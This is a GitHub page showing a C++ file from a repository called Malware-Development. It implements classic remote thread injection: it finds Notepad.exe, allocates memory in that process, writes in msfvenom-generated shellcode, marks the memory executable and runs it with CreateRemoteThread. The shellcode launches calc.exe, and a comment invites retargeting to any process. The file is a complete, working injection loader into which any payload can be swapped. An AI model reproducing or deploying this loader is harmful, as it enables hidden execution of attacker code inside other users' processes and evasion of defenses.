Malware-Development/AutoRemoteThreadInjection.cpp at main · ThanniKudam/Malware-Development · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
#include <Windows.h>
#include <stdio.h>
#include <TlHelp32.h>

DWORD oldprotect = 0;
DWORD TID;
DWORD PID = 0;
unsigned char poop[] =
/* Shellcode of calc.exe generated using msfvenom */
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

int main() {

	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

	if (snapshot == INVALID_HANDLE_VALUE) {
		printf("[!] Failed to create a snapshot. Exiting with error: %ld\n");
		CloseHandle(snapshot);
		return EXIT_FAILURE;
	}

	printf("[+] Successfully got the snapshot\n");

	PROCESSENTRY32 pe32;
	pe32.dwSize = sizeof(PROCESSENTRY32);

	if (Process32First(snapshot, &pe32) == TRUE) {

		while (Process32Next(snapshot, &pe32) == TRUE) {
			//Here I am looking for notepad.exe process, change it to whatever process you want to target and compile :)
			if (_wcsicmp(pe32.szExeFile, L"Notepad.exe") == 0) {
				CloseHandle(snapshot);
				PID =  pe32.th32ProcessID;
				break;
			}
		}
	}

	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
	if (hProcess == NULL) {
		printf("[!] Failed to open process. Exiting with error: %ld\n", GetLastError());
		return EXIT_FAILURE;
	}
	printf("[+] Opened the process successfully.\n");

	LPVOID virtualmem = VirtualAllocEx(hProcess, NULL, sizeof(poop), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
	if (virtualmem == NULL) {
		printf("[!] Failed to allocate memory. Exiting with error: %ld\n", GetLastError());
		return EXIT_FAILURE;
	}
	printf("[+] Memory allocation successful.\n\t\\----0x%p\n", virtualmem);

	BOOL writemem = WriteProcessMemory(hProcess, virtualmem, &poop, sizeof(poop), NULL);
	if (writemem == 0) {
		printf("[!] Failed to write memory. Exiting with error: %ld\n", GetLastError());
		return EXIT_FAILURE;
	}
	printf("[+] Memory written successfuly.\n");

	BOOL changemem = VirtualProtectEx(hProcess, virtualmem, sizeof(poop), PAGE_EXECUTE_READ, &oldprotect);
	if (changemem == 0) {
		printf("[!] Failed to change the memory protection rights. Exiting with error: %ld\n", GetLastError());
		return EXIT_FAILURE;
	}
	printf("[+] Changed the memory protection from read,write to execute,read\n");

	HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)virtualmem, NULL, 0, &TID);
	if (hThread == NULL) {
		printf("[!] Failed to create a thread. Exiting with error: %ld\n", GetLastError());
		return EXIT_FAILURE;
	}
	printf("[+] Successfully created remote thread\n");

	WaitForSingleObject(hProcess, INFINITE);
	printf("[*] Cleaning up...\n");
	CloseHandle(hProcess);
	CloseHandle(hThread);

	return EXIT_SUCCESS;

}